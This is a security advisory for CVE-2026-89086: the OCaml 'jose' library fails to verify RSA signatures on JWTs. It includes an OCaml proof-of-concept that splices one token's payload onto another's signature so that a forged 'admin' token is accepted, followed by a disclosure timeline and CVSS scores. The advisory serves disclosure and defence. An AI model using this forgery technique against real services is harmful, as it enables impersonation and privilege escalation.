CVE
CVE-2026-89086
JOSE: missing RSA signature verification
The opam package "jose" does not validate any RSA signature. It checks the encoding being PKCS1, but does not verify with the public key.
Reproduction
With jose 0.10.0, the code below signs two tokens with the same key and glues one's payload onto the other's signature:
let () = Mirage_crypto_rng_unix.use_default ()
let key =
Jose.Jwk.make_priv_rsa (Mirage_crypto_pk.Rsa.generate ~bits:2048 ())
let sign sub =
Jose.Jwt.sign key ~payload:(`Assoc [ ("sub", `String sub) ])
|> Result.get_ok |> Jose.Jwt.to_string
let seg n token = List.nth (String.split_on_char '.' token) n
let alice = sign "alice" and admin = sign "admin"
(* alice's header and signature, admin's payload *)
let forged = String.concat "." [ seg 0 alice; seg 1 admin; seg 2 alice ]
match
Jose.Jwt.unsafe_of_string forged
|> Result.get_ok
|> Jose.Jwt.validate ~jwk:(Jose.Jwk.pub_of_priv key) ~now:(Ptime_clock.now ())
with
| Ok t ->
print_endline
("accepted, sub = " ^ Option.get (Jose.Jwt.get_string_claim t "sub"))
| Error _ -> print_endline "rejected"The dune file:
(executable (name repro)
(libraries jose mirage-crypto-pk mirage-crypto-rng.unix ptime.clock.os))This prints "accepted, sub = admin".
Workaround
There is no workaround known.
Timeline
- 2026-08-25: private report via email to the authors of jose
- 2026-08-25: fix published to repository
- 2026-08-31: mail escalated to security@ocaml.org
- 2026-09-04: released jose 0.11.0
- 2026-09-10: published advisory
Package Versions Affected
Package Version
patch Availability
No items found.
Automatically patch vulnerabilities without upgrading
Fix Without Upgrading
Detect compatible fix
Apply safe remediation
Fix with a single pull request
CVSS Version
Severity
Base Score
CVSS Version
Score Vector

C
H
U
9.1
-
3.1
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

C
H
U
0
-
3.1
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

C
H
U
-
Related Resources
No items found.